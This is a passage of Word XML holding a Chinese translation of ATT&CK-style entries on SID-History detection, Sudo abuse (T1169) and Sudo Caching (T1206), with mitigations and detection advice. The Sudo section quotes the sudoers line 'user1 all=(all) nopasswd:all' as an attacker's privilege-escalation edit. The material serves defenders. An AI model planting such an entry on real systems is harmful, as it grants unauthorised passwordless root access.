            </w:r>
            <w:r w:rsidRPr="00E96CB7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>筛选可应用于林间信任。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="253DFC63" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56082014" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell Get-ADUser Cmdlet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>检查用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> SID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>历史记录属性中的数据，尤其是具有来自同一域的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> SID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>历史记录值的用户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C38F5D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监控域控制器上的帐户管理事件，以便成功和失败地更改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> SID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>历史记录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395F8C12" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>DsAddSidHistory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>函数的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218D6B9A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="785EF1BA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4965BD59" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1169</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F1DE755" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>权限升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19408637" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B69B9C1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02080FC9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有效权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A52505D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12E1B810" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D6C58CD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7097AC2D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>/etc/sudoers</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件描述了哪些用户可以运行哪些命令以及从哪些终端运行命令。文件还描述了用户可以作为其他用户或组运行哪些命令。这涉及到了最小权限的概念，即用户在大多数时间内都以尽可能低的权限运行，只在需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>时</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>提示输入密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提升到其他用户或权限。然而，攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>还是可以在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudoers</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中编辑类似</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user1 all=</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nopasswd:all</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样的内容来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>指定何时不</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示用户输入密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B5365C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudoers</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些配置来以其他用户身份执行命令，或以更高权限来生成进程。但前提是攻击者必须有足够</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的权限来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编辑此文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F30C37" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2294"/>
        <w:gridCol w:w="7442"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00B245BB" w14:paraId="14150A6E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6E285492" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B245BB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B245BB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1C4166E4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B245BB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B245BB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="2D52BAA3" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="063DCA06" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特权账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B7BF42B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>设置密码</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>。</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>即使攻击者可以获得终端访问权限，他们也必须获得</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>sudoers</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件中用来</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>运行内容的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>密码。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="54F939F4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59CECEB6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件和目录权限限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DDD119A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>严格</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编辑</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>sudoers</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件。必须始终</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>要有密码，而且</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户不能以具有更高权限的用户身份生成风险进程。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78312CF7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1196EC14" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EB87EA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>inux</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>系统中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>auditd</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会在每次发现用户实际</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和有效</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不一致时发出警报。（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>udo</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会出现</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种不一致</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CA153F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:sectPr w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidSect="00F815A5">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="1080" w:header="567" w:footer="567" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:titlePg/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E9DC151" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>udo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>缓存</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="2A86E2D5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="450E1971" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007353CB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007353CB">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007353CB">
              <w:t xml:space="preserve"> T1206</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48F2D5CC" w14:textId="6EF0D31A" w:rsidR="000F2665" w:rsidRPr="007353CB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="007353CB">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="007353CB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00DE009F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2700D378" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007353CB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007353CB">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007353CB">
              <w:t xml:space="preserve"> Linux, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65BD6CB2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007353CB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007353CB">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="007353CB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007353CB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EFFDB28" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007353CB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007353CB">
              <w:t>有效权限</w:t>
            </w:r>
            <w:r w:rsidRPr="007353CB">
              <w:t>: root</w:t>
            </w:r>
            <w:r w:rsidRPr="007353CB">
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="288755FD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007353CB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007353CB">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007353CB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AFA972F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
